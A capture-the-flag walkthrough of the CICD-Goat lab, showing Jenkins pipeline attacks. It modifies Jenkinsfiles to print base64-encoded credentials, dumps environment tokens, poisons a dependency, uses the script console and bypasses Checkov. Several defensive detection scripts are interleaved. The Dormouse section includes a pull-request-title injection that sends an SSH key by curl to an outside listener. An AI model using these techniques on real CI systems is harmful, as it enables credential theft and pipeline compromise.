CiCd-Goat

Prerequisites

- Jenkins: http://localhost:8080
  - Username: alice
  - Password: alice
- Gitea: http://localhost:3000
  - Username: thealice
  - Password: thealice

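If you want to look closely at how the administrator configured the environment, you can log in to the back end with the following credentials:
- CTFd
  - Username: admin
  - Password: ciderland5#
- Jenkins
  - Username: admin
  - Password: ciderland5#
- Gitea
  - Username: red_queen
  - Password: ciderland5#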

Easy

White Rabbit

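I'm late, I'm late! No time to say hello, goodbye! Before you get caught, use your access to the Wonderland/white-rabbit repository to steal the flag1 secret stored in the Jenkins credential store.
There are also two hints:

  1. Try to trigger the pipeline through the repository.
  2. How can credentials be accessed from a Jenkinsfile?
  • Change the Jenkins configuration
  • Log in with the admin account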

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-00-56_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-01-52_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Go from Jenkins to Gitea
  • Follow the hint to the corresponding repository

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-04-00_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Download the source code with git
git clone http://192.168.72.129:3000/Wonderland/white-rabbit.git

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-04-53_d41d8cd98f00b204e9800998ecf8427e.jpg

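  • Modify the contents of the Jenkinsfile
stage ('Get_Flags') {
    steps {
        // bind the 'flag1' secret-text credential to the variable $flag1
        withCredentials([string(credentialsId: 'flag1', variable: 'flag1')]) {
            // print the bound value base64-encoded
            sh '''
                echo $flag1 | base64
            '''
        }
    }
}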

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-08-31_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Commit and push with git
git checkout -b challenge1
git add .
git commit -m 'first'
git push -u origin challenge1

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-09-41_d41d8cd98f00b204e9800998ecf8427e.jpg

  • The new branch is visible in Gitea

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-11-26_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Create a pull request

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-12-34_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Go back to Jenkins

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-13-58_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-14-16_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-15-18_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-16-47_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-17-13_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Scroll down

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-17-45_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Decode the output to get the flag

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-18-37_d41d8cd98f00b204e9800998ecf8427e.jpg

Mad Hatter

  • This one is much the same as the one above
  • Clone the repository with git

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-43-42_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Modify the file

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-44-11_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Switch branch and commit

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-45-00_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Go to Gitea and open a pull request

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-45-49_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Go back to Jenkins

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-46-26_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-47-34_d41d8cd98f00b204e9800998ecf8427e.jpg

  • console output

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-48-04_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Base64-decode and submit

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-49-23_d41d8cd98f00b204e9800998ecf8427e.jpg

Duchess

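  • Clone the challenge repository
git clone http://192.168.72.129:3000/Wonderland/duchess.git
  • Download the tool
cd duchess

wget https://github.com/gitleaks/gitleaks/releases/download/v8.18.0/gitleaks_8.18.0_linux_x64.tar.gz

# unpack only the gitleaks binary from the release archive
tar -xzf gitleaks_8.18.0_linux_x64.tar.gz gitleaks

# scan the repository's commit history for secrets and print each finding
./gitleaks detect -v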

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_14-12-08_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_14-16-23_d41d8cd98f00b204e9800998ecf8427e.jpg

Moderate

Caterpillar

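  • First fork the repository, then modify the Jenkinsfile in the fork so that it prints Jenkins' environment variables
  • Open a pull request against the main branch
pipeline {
    agent any

    stages {
        stage('Install_Requirements') {
            steps {
                // dump the build environment to the console log
                sh '''
                    env
                '''
                // dependency installation steps go here
            }
        }
        // other stages...
    }
}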

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_14-56-31_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Go back to Jenkins and check the result

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_14-57-22_d41d8cd98f00b204e9800998ecf8427e.jpg

  • This yields GITEA_TOKEN; use this Gitea token to clone the original repository
GITEA_TOKEN=5d3ed5564341d5060c8524c41fe03507e296ca46

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_15-24-23_d41d8cd98f00b204e9800998ecf8427e.jpg

git clone http://5d3ed5564341d5060c8524c41fe03507e296ca46@192.168.72.129:3000/Wonderland/caterpillar.git

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_15-03-32_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Then create a branch, commit and merge, which triggers the other pipeline, wonderland-caterpillar-prod
pipeline {
    agent any

    stages {
        stage('deploy') {
            steps {
                // bind the 'flag2' username/password credential; the password lands in $TOKEN
                withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'flag2', passwordVariable: 'TOKEN')]) {
                    sh 'echo $TOKEN | base64'
                }
            }
        }
        // other stages...
    }
}

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_15-21-50_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Base64-decode and submit

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_15-25-28_d41d8cd98f00b204e9800998ecf8427e.jpg
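
Jenkins masks a bound credential in the console log only where it appears verbatim, so the encoded output produced by the White Rabbit and Caterpillar Jenkinsfiles above reaches the log unmasked. The following is an added example, not code from the original post: a defender-side log check that decodes base64-looking tokens in console output and compares their digests with those of known credentials. The secret value, the log lines and the token-length threshold are constructed assumptions.

```python
import base64
import binascii
import hashlib
import re

# Runs of base64 alphabet long enough to carry a secret (threshold is an assumption).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def fingerprint(value: bytes) -> str:
    """SHA-256 of the secret, so the scanner stores digests rather than secrets."""
    return hashlib.sha256(value.strip()).hexdigest()


def find_encoded_secrets(log_text: str, secret_digests: set[str]) -> list[tuple[int, str]]:
    """Return (line number, token) for base64 tokens that decode to a known secret.

    Assumes the encoded value fits on one log line.
    """
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for token in B64_TOKEN.findall(line):
            try:
                decoded = base64.b64decode(token, validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid base64, e.g. an ordinary word
            if fingerprint(decoded) in secret_digests:
                hits.append((lineno, token))
    return hits


# Constructed secret and console log, shaped like the output of `echo $flag1 | base64`.
SAMPLE_SECRET = b"constructed-flag-value-0001"
SAMPLE_LOG = "\n".join([
    "[Pipeline] withCredentials",
    "Masking supported pattern matches of $flag1",
    "[Pipeline] sh",
    "+ echo ****",
    "+ base64",
    base64.b64encode(SAMPLE_SECRET + b"\n").decode(),
    "[Pipeline] }",
])

if __name__ == "__main__":
    for lineno, token in find_encoded_secrets(SAMPLE_LOG, {fingerprint(SAMPLE_SECRET)}):
        print(f"line {lineno}: base64 token decodes to a stored credential")
```

A hit means the credential has left the credential store and should be rotated, whatever the build result was.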

Cheshire Cat

  • Clone the repository, create a branch and modify the Jenkinsfile
pipeline {
    // run on the controller's built-in node
    agent {label 'built-in'}
    environment {
        PROJECT = "sanic"
    }
    stages {
        stage ('Install_Requirements') {
            steps {
                sh 'cat ~/flag5.txt'
            }
        }
    }
    post {
        always {
            cleanWs()
        }
    }
}
  • flag5.txt is on the filesystem of the "Built-In Node", so it is enough to run a command there directly to read the file. Find the corresponding node and run a Groovy script in its Script Console
println "cat /var/jenkins_home/flag5.txt".execute().text

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_16-16-49_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_16-17-09_d41d8cd98f00b204e9800998ecf8427e.jpg

Twiddledum

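The target is a folder. Gitea has two repositories, twiddledee and twiddledum. Building twiddledum in Jenkins shows that the pipeline runs node index.js, and that index.js requires twiddledee. twiddledum is not under our control but twiddledee is, so the malicious code is injected into twiddledee.

  • Modify twiddledee's index.js and push it directly to the main branch.
var pjson = require('./package.json');
// print the FLAG6 environment variable of the requiring build, base64-encoded
console.log(Buffer.from(process.env.FLAG6).toString("base64"))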

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-43-46_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Delete the earlier 1.1.0 release and tag, then publish them again:

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-45-49_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-46-18_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-46-37_d41d8cd98f00b204e9800998ecf8427e.jpg
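
The Twiddledum build picks up the republished 1.1.0 because a tag can be deleted and re-created on different code. The following is an added example, not code from the original post: a manifest check that reports git-sourced npm dependencies that are not pinned to a full commit SHA. The package.json content, host name and SHA are constructed assumptions about how twiddledum references twiddledee.

```python
import json
import re

FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
# npm dependency specs that resolve through git rather than a registry.
GIT_SPEC = re.compile(r"^(git\+|git://|github:|gitlab:|bitbucket:)")
SECTIONS = ("dependencies", "devDependencies", "optionalDependencies")


def mutable_git_dependencies(package_json_text: str) -> dict[str, str]:
    """Map each git dependency not pinned to a full commit SHA to the ref it uses."""
    manifest = json.loads(package_json_text)
    findings = {}
    for section in SECTIONS:
        for name, spec in manifest.get(section, {}).items():
            if not GIT_SPEC.match(spec):
                continue  # registry version range, not a git source
            _, _, ref = spec.partition("#")
            if not FULL_SHA.match(ref):
                # tags, branches and semver ranges can be re-pointed upstream
                findings[name] = ref or "(default branch)"
    return findings


# Constructed manifest: host name, version range and SHA are sample values.
SAMPLE_SHA = "0123456789abcdef" * 2 + "01234567"
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "twiddledum",
    "dependencies": {
        "twiddledee": "git+http://gitea.example:3000/Wonderland/twiddledee#semver:^1.1.0",
        "pinned-lib": "git+http://gitea.example:3000/Wonderland/pinned-lib#" + SAMPLE_SHA,
        "registry-lib": "^1.3.0",
    },
})

if __name__ == "__main__":
    for name, ref in mutable_git_dependencies(SAMPLE_PACKAGE_JSON).items():
        print(f"{name}: resolved through mutable ref '{ref}'")
```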

Problems encountered with Twiddledum

  • npm reports an error

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-48-27_d41d8cd98f00b204e9800998ecf8427e.jpg

  • My own fix: edit the hosts file

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-49-32_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Before the change

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-50-09_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-51-13_d41d8cd98f00b204e9800998ecf8427e.jpg

  • After the change

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-50-51_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-51-34_d41d8cd98f00b204e9800998ecf8427e.jpg

dodo

  • Create a .checkov.yml
soft-fail: true
check:
  - THIS_NOT_THE_CHECK_YOUR_ARE_LOOKING_FOR

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_16-44-33_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Change the bucket acl in main.tf to public-read

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_16-45-19_d41d8cd98f00b204e9800998ecf8427e.jpg

  • After the push, the build gets past the check and yields the flag.

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_16-46-24_d41d8cd98f00b204e9800998ecf8427e.jpg
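
The dodo bypass works because Checkov reads a .checkov.yml found in the directory it scans, so the code under review supplies the scanner's own policy. The following is an added example, not code from the original post: a pre-scan guard that lists repo-supplied Checkov config files and the settings in them that suppress or narrow findings. The checkout is constructed, and the key list is this example's choice of Checkov options to flag.

```python
import re
import tempfile
from pathlib import Path

# Config file names Checkov loads automatically from the directory it scans.
CONFIG_NAMES = {".checkov.yml", ".checkov.yaml"}
# Top-level keys (named like the CLI flags) that can suppress or narrow findings.
WEAKENING_KEYS = {"soft-fail", "soft-fail-on", "check", "skip-check",
                  "skip-path", "skip-framework"}
TOP_LEVEL = re.compile(r"^([A-Za-z][\w-]*)\s*:\s*(.*)$")


def weakening_settings(config_text: str) -> list[str]:
    """List the weakening keys a Checkov config sets (top-level keys only)."""
    found = []
    for line in config_text.splitlines():
        m = TOP_LEVEL.match(line)
        if not m or m.group(1) not in WEAKENING_KEYS:
            continue
        key, value = m.group(1), m.group(2).strip().lower()
        if key == "soft-fail" and value in ("false", "no"):
            continue  # explicitly keeps hard failures
        found.append(key)
    return found


def audit_checkout(root: Path) -> dict[str, list[str]]:
    """Map every scanner config found in the checkout to the weakening keys it sets."""
    return {
        str(p.relative_to(root)): weakening_settings(p.read_text())
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.name in CONFIG_NAMES
    }


def demo() -> dict[str, list[str]]:
    # Constructed checkout holding the .checkov.yml shown above.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "main.tf").write_text('resource "aws_s3_bucket" "b" {}\n')
        (root / ".checkov.yml").write_text(
            "soft-fail: true\ncheck:\n  - THIS_NOT_THE_CHECK_YOUR_ARE_LOOKING_FOR\n")
        return audit_checkout(root)
```

A pipeline step can fail the build, or require a reviewer, whenever `audit_checkout` returns a non-empty result for an untrusted checkout.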

Some errors

  • Edit the hosts file

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_16-47-16_d41d8cd98f00b204e9800998ecf8427e.jpg

Hard

Hearts

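  • Knave is the admin of the agents
  • Found by brute force: knave/rockme

Deploy an SSH honeypot

docker run -p 2222:2222 cowrie/cowrie
  • Port forwarding
# enable IP forwarding and allow forwarded traffic
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -P FORWARD ACCEPT
iptables -A INPUT -p tcp --dport 2222 -j ACCEPT
# redirect inbound TCP port 22 to the honeypot on port 2222
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
  • Note that cowrie has to run in the foreground so the results are visible directly

Create a new node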

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-21-04_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-24-30_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-25-22_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Click Save and wait for the result

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-26-45_d41d8cd98f00b204e9800998ecf8427e.jpg

Dormouse

  • Challenge repository: Wonderland/dormouse
  • According to the Jenkinsfile
  • http://0177.0.0.01:8008/reportcov.sh, i.e. 127.0.0.1:8008/reportcov.sh (0177.0.0.01 is 127.0.0.1 written in octal)

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-39-35_d41d8cd98f00b204e9800998ecf8427e.jpg

  • This link shows that there is another repository, Cov/reportcov
  • According to its Jenkinsfile

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-43-20_d41d8cd98f00b204e9800998ecf8427e.jpg

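  • According to an expert's analysis, a P-PPE attack can be carried out.
  • Based on the code below:
stage ('Deploy') {
    steps {
        // write the SSH private key from $KEY to a file, with command tracing off
        sh "set +x && echo \"${KEY}\" > key && chmod 400 key && set -x"
        // copy reportcov.sh to the prod web root using that key
        sh 'scp -o StrictHostKeyChecking=no -i key reportcov.sh root@prod:/var/www/localhost/htdocs'
    }
}
  • The node that runs this has $KEY, which is an SSH private key. Code injection can be used to obtain this key, and scp can then be used to deliver a malicious reportcov.sh, so that our malicious code runs when the dormouse repository is built.

  • Fork Cov/reportcov, make an arbitrary change and push it, open a pull request and inject the malicious code in the title; remember to listen on the port
`echo "${KEY}" > key && curl -v -F file=@key http://192.168.88.43:64434`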

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-49-15_d41d8cd98f00b204e9800998ecf8427e.jpg

  • On the listening port

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-50-19_d41d8cd98f00b204e9800998ecf8427e.jpg

Mock Turtle

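  • The Jenkins code has three layers of checks:
  • The first part checks that the number of words added and the number of words removed are the same
  • The second part checks that the version file has only one line and matches the x.y.z format
  • The third part checks whether the pull request modifies the version file. If the conditions above are met, the merge is executed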

  • So modify the Jenkinsfile
pipeline {
    agent any
    stages {
        stage('pr_checks') {
            steps {
                // bind the 'flag10' username/password credential; the password lands in $TOKEN
                withCredentials([usernamePassword(credentialsId: 'flag10', usernameVariable: 'flag10', passwordVariable: 'TOKEN')]) {
                    sh 'echo $TOKEN | base64'
                }
            }
        }
    }
}
  • Modify version
1.0.13
  • Create 1.txt to make up for the number of words removed
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
  • The additions and removals are now equal

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_15-44-42_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Open the pull request and check Jenkins

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_15-46-00_d41d8cd98f00b204e9800998ecf8427e.jpg
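
None of the three Mock Turtle checks looks at which files the pull request changes. The following is an added example, not the challenge's Jenkinsfile: it re-implements the three conditions over a summary of a pull request and adds a protected-path check that keeps a pull request touching the pipeline definition out of auto-merge. The change-summary format, the protected file list and the word counts are constructed assumptions.

```python
import re
from dataclasses import dataclass

VERSION_RE = re.compile(r"^\d+\.\d+\.\d+$")
# Files that define or steer the pipeline (assumed list for this example).
PROTECTED_NAMES = {"Jenkinsfile"}


@dataclass
class FileChange:
    path: str
    words_added: int
    words_removed: int


def passes_described_checks(changes: list[FileChange], version_text: str) -> bool:
    """The three conditions listed above, over a summary of the pull request."""
    added = sum(c.words_added for c in changes)
    removed = sum(c.words_removed for c in changes)
    lines = version_text.splitlines()
    one_line_semver = len(lines) == 1 and VERSION_RE.match(lines[0]) is not None
    version_changed = any(c.path == "version" for c in changes)
    return added == removed and one_line_semver and version_changed


def protected_files_touched(changes: list[FileChange]) -> list[str]:
    """Changed paths whose file name is on the protected list, in any directory."""
    return [c.path for c in changes if c.path.rsplit("/", 1)[-1] in PROTECTED_NAMES]


def may_auto_merge(changes: list[FileChange], version_text: str) -> bool:
    """Auto-merge only when the checks pass and no pipeline file is changed."""
    return passes_described_checks(changes, version_text) and not protected_files_touched(changes)


# Constructed pull requests; the word counts are sample values.
ROUTINE_PR = [FileChange("version", 1, 1), FileChange("README.md", 12, 12)]
PIPELINE_PR = [
    FileChange("Jenkinsfile", 30, 160),   # pipeline definition rewritten
    FileChange("version", 1, 1),
    FileChange("1.txt", 130, 0),          # filler that evens out the word counts
]
```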

Gryphon

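I didn't understand how this one works, so this is a placeholder for now.

You can refer to the expert's article.

Reference articles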